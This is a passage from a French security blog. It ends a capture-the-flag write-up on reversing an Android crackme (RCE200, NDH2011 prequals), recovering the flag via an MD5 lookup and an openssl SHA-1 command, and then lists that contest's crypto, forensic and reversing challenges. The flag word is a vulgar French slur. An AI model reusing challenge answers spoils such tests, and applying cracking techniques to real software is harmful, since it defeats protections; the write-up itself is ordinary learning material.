Decrypted: 'google_sdk|'
Decrypted: 'MD5'
Decrypted: 'android.speech.action.RECOGNIZE_SPEECH'
Decrypted: 'SHA-1'

On trouve un hash MD5, tiens tiens ...
Une petite recherche google nous donne ceci:
md5(salope) = f9dd11ff6857af73ac9a944dfc52f41b

Donc au final, l'application va faire un hash sha1 du mot qu'on prononce et l'afficher si celui-ci est correct.
Je n'ai pas réussi à l'obtenir par ce biais, mais nous savons que c'est un sha1.
$ printf "salope" | openssl dgst -sha1

Et voilà, done :).

J'espère que ce rapide tour d'horizon du reversing Android vous a plut.
J'ai mis plus de doc en lien si vous voulez approfondir ;).

Je n'ai pas encore fini de reverser le RCE300 par contre, donc l'article de reversing NDS va attendre un peu.



- ReverseMe: RCE200
- Tool: dex2jar
- Tool: apktool
- Doc: DalvikVM
- Doc: dalvik opcodes
- Doc: Reversing Android par virtualabs
- Doc: Primer on Android OS Reversing by ARTeam

Prequals NDH2011


Ce week-end s'est déroulé les prequals de la NDH2011 (de Vendredi soir minuit à Dimanche soir minuit).
Les challenges comprenaient les catégories suivantes: crypto, web, reversing et forensic.
A notre grande surprise, il n'y avait pas d'exploitation comme à notre habitude, nous avons donc dû nous rabattre sur d'autres joix binaires.

Voici donc les différentes épreuves auquelles nous avons eu droit.

crypto 100: Un cryptext
crypto 200: On avait une image JPG cryptée et un code de génération de password (fallait bruteforcer)
crypto 300: Un soft python avec un échange de clé entre client et serveur, il faut pouvoir récupérer la clé

forensic 100: Analyse d'un dump de mémoire dynamique
forensic 200: Cracking d'une base Active Directory NTDS.DIT (avec le system qui va bien)
forensic 300: Analyse d'un raw dump contenant potentiellement des partitions NTFS ou exFAT ou autre

Web: Aucune idée, je n'y ai pas touché du tout

rce 100: Programme Windows à déplomber
rce 200: Application Android à déplomber
rce 300: Application NDS à déplomber

C'était en somme toute des prequals assez sympa, à refaire :).
Bravo à la team de sysdream pour l'organisation de leur premier prequals ^^.

J'écrirais quelques write-ups dans les articles suivants.